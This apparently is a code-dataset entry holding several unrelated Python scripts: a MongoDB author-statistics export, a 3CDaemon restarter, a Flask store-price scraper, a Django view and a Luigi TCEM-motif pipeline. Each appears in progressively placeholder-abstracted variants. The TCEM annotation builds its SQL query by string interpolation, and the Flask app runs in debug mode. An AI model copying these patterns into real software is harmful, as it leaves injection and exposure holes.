"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# Exports a CSV with top authors and their publications, to check a) disambiguation and b) h-index\n__author__ = \"\"\"Giovanni Colavizza\"\"\"\n\nimport codecs\n\n# MongoDB\nfrom pymongo import MongoClient\nfrom configparser import ConfigParser\nconfig_set = \"localhost\" # this is in localhost\nconfig = ConfigParser(allow_no_value=False)\nconfig.read(\"config/config.conf\")\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\n\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\n\nlimit = 10\n\n# get records\nauthors = list()\nfor record in collection_authors.find():\n\tauthors.append({\"tot_cit\":record[\"tot_cit\"],\"name\":record[\"name\"],\"n_pub\":len(record[\"publications\"]),\"publications\":record[\"publications\"],\"h_index\":record[\"h_index\"]})\n\nauthors = sorted(authors,key=lambda x:x[\"n_pub\"],reverse=True)\nwith codecs.open(\"exports/evaluation_authors.csv\",\"w\",encoding=\"utf8\") as f:\n\tf.write(\"id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n\")\n\tfor n,a in enumerate(authors[:limit]):\n\t\tfor p in a[\"publications\"]:\n\t\t\ttitle = p[\"title\"].replace('\"','')\n\t\t\ttitle = title.replace('\\n', ' ')\n\t\t\ttitle = title.replace('\\r', ' ')\n\t\t\tf.write(str(n)+\",\"+'\"'+a[\"name\"]+'\"'+\",\"+str(a[\"h_index\"])+\",\"+str(a[\"tot_cit\"])+\",\"+'\"'+title+'\"'+\",\"+str(p[\"year\"])+\",\"+str(p[\"n_cit\"])+\"\\n\")\n",
"__author__ = 'Giovanni Colavizza'\nimport codecs\nfrom pymongo import MongoClient\nfrom configparser import ConfigParser\nconfig_set = 'localhost'\nconfig = ConfigParser(allow_no_value=False)\nconfig.read('config/config.conf')\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\nlimit = 10\nauthors = list()\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\nauthors = sorted(authors, key=lambda x: x['n_pub'], reverse=True)\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"__author__ = 'Giovanni Colavizza'\n<import token>\nconfig_set = 'localhost'\nconfig = ConfigParser(allow_no_value=False)\nconfig.read('config/config.conf')\nmongo_db = config.get(config_set, 'db-name')\nmongo_user = config.get(config_set, 'username')\nmongo_pwd = config.get(config_set, 'password')\nmongo_auth = config.get(config_set, 'auth-db')\nmongo_host = config.get(config_set, 'db-host')\nmongo_port = config.get(config_set, 'db-port')\nclient = MongoClient(mongo_host)\ndb = client[mongo_db]\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\ncollection = db.stats_dev\ncollection_authors = db.authors_dev\nlimit = 10\nauthors = list()\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\nauthors = sorted(authors, key=lambda x: x['n_pub'], reverse=True)\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"<assignment token>\n<import token>\n<assignment token>\nconfig.read('config/config.conf')\n<assignment token>\ndb.authenticate(mongo_user, mongo_pwd, source=mongo_auth)\n<assignment token>\nfor record in collection_authors.find():\n authors.append({'tot_cit': record['tot_cit'], 'name': record['name'],\n 'n_pub': len(record['publications']), 'publications': record[\n 'publications'], 'h_index': record['h_index']})\n<assignment token>\nwith codecs.open('exports/evaluation_authors.csv', 'w', encoding='utf8') as f:\n f.write('id,name,h_index,tot_cit,publication_title,pub_year,n_cit\\n')\n for n, a in enumerate(authors[:limit]):\n for p in a['publications']:\n title = p['title'].replace('\"', '')\n title = title.replace('\\n', ' ')\n title = title.replace('\\r', ' ')\n f.write(str(n) + ',' + '\"' + a['name'] + '\"' + ',' + str(a[\n 'h_index']) + ',' + str(a['tot_cit']) + ',' + '\"' + title +\n '\"' + ',' + str(p['year']) + ',' + str(p['n_cit']) + '\\n')\n",
"<assignment token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,806 | 97ce53a4c5995339469d956011be6e466acc49a9 | #coding=utf-8
import os,sys,time
def start3CD():
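    """Kill any 3CDaemon instance that is already running, then relaunch it from the local 3cd folder."""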
    print(u'尝试关闭已经开启的3CD')  # "Trying to close any 3CD that is already running"
os.system('taskkill -f -im 3CDaemon.EXE')
    print(u'当前运行路径:'+os.getcwd())  # "Current running path:" followed by os.getcwd()
os.system('.\\3cd\\3CDaemon.EXE')
if __name__=='__main__':
start3CD() | [
"#coding=utf-8 \nimport os,sys,time\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:'+os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\nif __name__=='__main__':\n start3CD()",
"import os, sys, time\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\nif __name__ == '__main__':\n start3CD()\n",
"<import token>\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\nif __name__ == '__main__':\n start3CD()\n",
"<import token>\n\n\ndef start3CD():\n print(u'尝试关闭已经开启的3CD')\n os.system('taskkill -f -im 3CDaemon.EXE')\n print(u'当前运行路径:' + os.getcwd())\n os.system('.\\\\3cd\\\\3CDaemon.EXE')\n\n\n<code token>\n",
"<import token>\n<function token>\n<code token>\n"
] | false |
99,807 | 5f636b85df78c497647d49e9464ebcf9ebe1a4f9 | from flask import Flask, render_template, request
import datetime
import pandas as pd
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))
from scraper import *
from data_management import SearchResult, TransformDf2Html
from site_language import *
app = Flask(__name__)
# global definitions
nav_lang = {}
country_code = {}
sterm = ''
sort_type = 'price'
prod_collect = []
df = SearchResult(prod_collect)
@app.route('/', methods=['GET'])
def index():
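    """Landing page: read the country code from the query string and clear any cached search results."""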
global nav_lang
global country_code
global error_lang
global prod_collect
country_code = request.args.get('country', 'UK')
prod_collect = [] # if there was something in it, clear it
return(render_template('index.html', lang=index_search_lang[country_code], nav_lang=navbar_lang[country_code], err_lang=error_lang[country_code]))
@app.route('/results', methods=['POST'])
def results():
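    """First request for a term: scrape the configured stores and cache the results; later requests just re-sort the cached results."""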
global nav_lang
global country_code
global error_lang
global results_lang
global sterm
global sort_type
global prod_collect
global df
sterm = request.form.get('term', sterm)
stype = request.form.get('sort_type', sort_type)
if sterm == '':
return(render_template('error.html', err_lang=error_lang[country_code], nav_lang=navbar_lang[country_code]))
store_list = init_stores(STORE_DICT[country_code])
if prod_collect == []:
for st in store_list:
class2call = STORE_MAP[country_code].get(st.name)
prod_info = class2call(sterm, st)
prod_info.start_collecting_data()
prod_collect.extend(prod_info._items)
df = SearchResult(prod_collect)
transdf = TransformDf2Html(df.df[['store_name', 'link', 'price', 'unit price', 'promotion']])
html_return = transdf.df2html_table(id='myTable', table_class='table table-hover', header_class='thead-dark')
else:
# import pdb
# pdb.set_trace()
prod_collect = df.sort_df(byWhat=stype)
return(render_template('results.html', sterm=prod_collect, nav_lang=navbar_lang[country_code], result_lan=results_lang[country_code]))
if __name__ == '__main__':
app.run(debug = True)
| [
"from flask import Flask, render_template, request\nimport datetime\nimport pandas as pd\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n\nfrom scraper import *\nfrom data_management import SearchResult, TransformDf2Html\nfrom site_language import *\napp = Flask(__name__)\n\n# global definitions\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = [] # if there was something in it, clear it\n return(render_template('index.html', lang=index_search_lang[country_code], nav_lang=navbar_lang[country_code], err_lang=error_lang[country_code]))\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return(render_template('error.html', err_lang=error_lang[country_code], nav_lang=navbar_lang[country_code]))\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price', 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class='table table-hover', header_class='thead-dark')\n else:\n # import pdb\n # pdb.set_trace()\n\n prod_collect = df.sort_df(byWhat=stype)\n\n\n return(render_template('results.html', sterm=prod_collect, nav_lang=navbar_lang[country_code], result_lan=results_lang[country_code]))\n\nif __name__ == '__main__':\n app.run(debug = True)\n",
"from flask import Flask, render_template, request\nimport datetime\nimport pandas as pd\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\nfrom scraper import *\nfrom data_management import SearchResult, TransformDf2Html\nfrom site_language import *\napp = Flask(__name__)\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n<import token>\napp = Flask(__name__)\nnav_lang = {}\ncountry_code = {}\nsterm = ''\nsort_type = 'price'\nprod_collect = []\ndf = SearchResult(prod_collect)\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'scraper'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', 'data_handling'))\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\[email protected]('/results', methods=['POST'])\ndef results():\n global nav_lang\n global country_code\n global error_lang\n global results_lang\n global sterm\n global sort_type\n global prod_collect\n global df\n sterm = request.form.get('term', sterm)\n stype = request.form.get('sort_type', sort_type)\n if sterm == '':\n return render_template('error.html', err_lang=error_lang[\n country_code], nav_lang=navbar_lang[country_code])\n store_list = init_stores(STORE_DICT[country_code])\n if prod_collect == []:\n for st in store_list:\n class2call = STORE_MAP[country_code].get(st.name)\n prod_info = class2call(sterm, st)\n prod_info.start_collecting_data()\n prod_collect.extend(prod_info._items)\n df = SearchResult(prod_collect)\n transdf = TransformDf2Html(df.df[['store_name', 'link', 'price',\n 'unit price', 'promotion']])\n html_return = transdf.df2html_table(id='myTable', table_class=\n 'table table-hover', header_class='thead-dark')\n else:\n prod_collect = df.sort_df(byWhat=stype)\n return render_template('results.html', sterm=prod_collect, nav_lang=\n navbar_lang[country_code], result_lan=results_lang[country_code])\n\n\n<code token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n global nav_lang\n global country_code\n global error_lang\n global prod_collect\n country_code = request.args.get('country', 'UK')\n prod_collect = []\n return render_template('index.html', lang=index_search_lang[\n country_code], nav_lang=navbar_lang[country_code], err_lang=\n error_lang[country_code])\n\n\n<function token>\n<code token>\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,808 | 061b974da483c7ae05fae4156ebbcf80be0ac385 | from django.shortcuts import render, get_object_or_404
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, DetailView
from company.models import Profile
from make.models import Make
from series.models import Series
from accessories.models import Accessory
from products.models import Product
from productimages.models import ProductImage
from promos.models import Promo
class IndexPage(DetailView):
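    """Home page backed by the single company Profile (pk=1); adds all makes, series and the brand logo to the template context."""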
template_name = "index.html"
def get_object(self):
return get_object_or_404(Profile, id=1)
def get_context_data(self, **kwargs):
context = super(IndexPage, self).get_context_data(**kwargs)
context['make_list'] = Make.objects.all().order_by('name')
context['series_list'] = Series.objects.all().order_by('name')
context['brand_logo'] = self.object.logo
return context
| [
"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import ListView, DetailView\n\nfrom company.models import Profile\nfrom make.models import Make\nfrom series.models import Series\nfrom accessories.models import Accessory\nfrom products.models import Product\nfrom productimages.models import ProductImage\nfrom promos.models import Promo\n\n\nclass IndexPage(DetailView):\n template_name = \"index.html\"\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"from django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import ListView, DetailView\nfrom company.models import Profile\nfrom make.models import Make\nfrom series.models import Series\nfrom accessories.models import Accessory\nfrom products.models import Product\nfrom productimages.models import ProductImage\nfrom promos.models import Promo\n\n\nclass IndexPage(DetailView):\n template_name = 'index.html'\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n template_name = 'index.html'\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n\n def get_object(self):\n return get_object_or_404(Profile, id=1)\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n <function token>\n\n def get_context_data(self, **kwargs):\n context = super(IndexPage, self).get_context_data(**kwargs)\n context['make_list'] = Make.objects.all().order_by('name')\n context['series_list'] = Series.objects.all().order_by('name')\n context['brand_logo'] = self.object.logo\n return context\n",
"<import token>\n\n\nclass IndexPage(DetailView):\n <assignment token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,809 | 58e1a7d4730f07ed536368e4627de0f001a89455 | from django.views.generic import TemplateView, DetailView
from django.contrib.auth.models import User
class IndexView(TemplateView):
template_name = "transcendence/index.html"
class UserInfoView(DetailView):
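    # Detail page for a User looked up via the 'user_id' URL kwarg instead of the default 'pk'.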
template_name = "transcendence/user_info.html"
model = User
pk_url_kwarg = 'user_id'
| [
"from django.views.generic import TemplateView, DetailView\nfrom django.contrib.auth.models import User\n\n\nclass IndexView(TemplateView):\n template_name = \"transcendence/index.html\"\n\n\nclass UserInfoView(DetailView):\n template_name = \"transcendence/user_info.html\"\n model = User\n pk_url_kwarg = 'user_id'\n",
"from django.views.generic import TemplateView, DetailView\nfrom django.contrib.auth.models import User\n\n\nclass IndexView(TemplateView):\n template_name = 'transcendence/index.html'\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n\n\nclass IndexView(TemplateView):\n template_name = 'transcendence/index.html'\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n\n\nclass IndexView(TemplateView):\n <assignment token>\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n<class token>\n\n\nclass UserInfoView(DetailView):\n template_name = 'transcendence/user_info.html'\n model = User\n pk_url_kwarg = 'user_id'\n",
"<import token>\n<class token>\n\n\nclass UserInfoView(DetailView):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n<class token>\n"
] | false |
99,810 | d4353d484da7eb1c228220a403269e9be9d6612f |
import luigi
import logging
import subprocess
import logging
import pandas as pd
import sqlite3
from os.path import join, dirname, basename
from .mixcr import MixcrClones
from .tcem_aa_db import TcemNrAaDb
from ....pipeline.utils.cap_task import CapTask
from ....pipeline.config import PipelineConfig
logger = logging.getLogger('tcems')
def countit(objs):
"""Return a dict with counts for each item in a list."""
out = {}
for el in objs:
out[el] = 1 + out.get(el, 0)
out = {k: v for k, v in out.items()}
return out
def get_binding_motifs(seq):
"""Return a dict of dicts with counts for different TCEM motifs."""
out = {'type_1': [], 'type_2a': [], 'type_2b': []}
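    # type_1: residues 4-8 of each 9-mer window (0-based slice 3:8);
    # type_2a / type_2b: residue 5 / residue 3 of each 15-mer window plus residues 6, 8, 10 and 11.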
for i in range(len(seq) - 9 + 1):
kmer = seq[i:i + 9]
out['type_1'].append(kmer[3:8])
for i in range(len(seq) - 15 + 1):
kmer = seq[i:i + 15]
tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]
out['type_2a'].append(kmer[4] + tail)
out['type_2b'].append(kmer[2] + tail)
counted = {k: countit(v) for k, v in out.items()}
return counted
def parse_mixcr_table(filepath):
"""Return counts of TCEMs for a set of CDR3 sequences."""
tbl = pd.read_csv(filepath, sep='\t')
out = {}
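    # out maps (motif_type, motif) -> counters: number of clone rows containing the motif, their
    # summed clone counts, motif occurrences across those rows, and occurrences weighted by clone count.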
for _, row in tbl.iterrows():
motifs = get_binding_motifs(row['aaSeqImputedCDR3'])
for kind, motif_counts in motifs.items():
for motif, count in motif_counts.items():
for mykind in [kind, 'all_types']:
key = (mykind, motif)
if key not in out:
out[key] = {
'num_unique_seqs': 0,
'num_clones': 0,
'num_unique_occurences': 0,
'num_clonal_occurences': 0,
}
out[key]['num_unique_seqs'] += 1
out[key]['num_clones'] += row['cloneCount']
out[key]['num_unique_occurences'] += count
out[key]['num_clonal_occurences'] += count * row['cloneCount']
return out
class TcemRepertoire(CapTask):
module_description = """
This module identifies repertoires of TCEMs in VDJ clonal sequences.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.mixcr = MixcrClones.from_cap_task(self)
self.config = PipelineConfig(self.config_filename)
def requires(self):
return self.mixcr
@classmethod
def version(cls):
return 'v0.1.1'
def tool_version(self):
return self.version()
@classmethod
def dependencies(cls):
return [MixcrClones]
@classmethod
def _module_name(cls):
return 'tcems::tcem_repertoire'
def output(self):
out = {
'tcem_counts': self.get_target(f'tcem_repertoire', 'csv'),
}
return out
@property
def tcem_counts_path(self):
return self.output()[f'tcem_counts'].path
def _run(self):
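        # Count TCEM motifs in the CDR3s of the MiXCR IGH clone table and write the counts to CSV.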
motif_counts = parse_mixcr_table(self.mixcr.igh_path)
out = pd.DataFrame.from_dict(motif_counts, orient='index')
out.to_csv(self.tcem_counts_path)
class AnnotatedTcemRepertoire(CapTask):
module_description = """
This module identifies repertoires of TCEMs in VDJ clonal sequences.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.repetoire = TcemRepertoire.from_cap_task(self)
self.db = TcemNrAaDb.from_cap_task(self)
self.config = PipelineConfig(self.config_filename)
def requires(self):
return self.repetoire
@classmethod
def version(cls):
return 'v0.1.0'
def tool_version(self):
return self.version()
@classmethod
def dependencies(cls):
return [TcemRepertoire]
@classmethod
def _module_name(cls):
return 'tcems::annotated_tcem_repertoire'
def output(self):
out = {
'tcem_annotations': self.get_target(f'annotated_tcem_repertoire', 'csv'),
}
return out
@property
def tcem_annotation_path(self):
return self.output()[f'tcem_annotations'].path
def _run(self):
with sqlite3.connect(self.db.tcem_index) as conn:
c = conn.cursor()
rep = pd.read_csv(self.repetoire.tcem_counts_path)
kmers = rep.iloc[:, 1].unique()
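            # Build a binary presence matrix (rows = TCEM motifs, columns = taxa that contain them)
            # by querying the prebuilt k-mer index; each row fetched from the cursor is a 1-tuple.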
tbl = {}
for kmer in kmers:
tbl[kmer] = {}
cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = "{kmer}"'
for taxon in c.execute(cmd):
tbl[kmer][taxon] = 1
tbl = pd.DataFrame.from_dict(tbl, orient='index')
tbl.to_csv(self.tcem_annotation_path)
| [
"\nimport luigi\nimport logging\nimport subprocess\nimport logging\nimport pandas as pd\nimport sqlite3\nfrom os.path import join, dirname, basename\n\nfrom .mixcr import MixcrClones\nfrom .tcem_aa_db import TcemNrAaDb\n\nfrom ....pipeline.utils.cap_task import CapTask\nfrom ....pipeline.config import PipelineConfig\n\n\nlogger = logging.getLogger('tcems')\n\n\ndef countit(objs):\n \"\"\"Return a dict with counts for each item in a list.\"\"\"\n out = {}\n for el in objs:\n out[el] = 1 + out.get(el, 0)\n out = {k: v for k, v in out.items()}\n return out\n\n\ndef get_binding_motifs(seq):\n \"\"\"Return a dict of dicts with counts for different TCEM motifs.\"\"\"\n out = {'type_1': [], 'type_2a': [], 'type_2b': []}\n for i in range(len(seq) - 9 + 1):\n kmer = seq[i:i + 9]\n out['type_1'].append(kmer[3:8])\n for i in range(len(seq) - 15 + 1):\n kmer = seq[i:i + 15]\n tail = kmer[5] + kmer[7] + kmer[9] + kmer[10]\n out['type_2a'].append(kmer[4] + tail)\n out['type_2b'].append(kmer[2] + tail)\n counted = {k: countit(v) for k, v in out.items()}\n return counted\n\n\ndef parse_mixcr_table(filepath):\n \"\"\"Return counts of TCEMs for a set of CDR3 sequences.\"\"\"\n tbl = pd.read_csv(filepath, sep='\\t')\n out = {}\n for _, row in tbl.iterrows():\n motifs = get_binding_motifs(row['aaSeqImputedCDR3'])\n for kind, motif_counts in motifs.items():\n for motif, count in motif_counts.items():\n for mykind in [kind, 'all_types']:\n key = (mykind, motif)\n if key not in out:\n out[key] = {\n 'num_unique_seqs': 0,\n 'num_clones': 0,\n 'num_unique_occurences': 0,\n 'num_clonal_occurences': 0,\n }\n out[key]['num_unique_seqs'] += 1\n out[key]['num_clones'] += row['cloneCount']\n out[key]['num_unique_occurences'] += count\n out[key]['num_clonal_occurences'] += count * row['cloneCount']\n return out\n\n\nclass TcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.mixcr = MixcrClones.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.mixcr\n\n @classmethod\n def version(cls):\n return 'v0.1.1'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [MixcrClones]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n\n def output(self):\n out = {\n 'tcem_counts': self.get_target(f'tcem_repertoire', 'csv'),\n }\n return out\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n 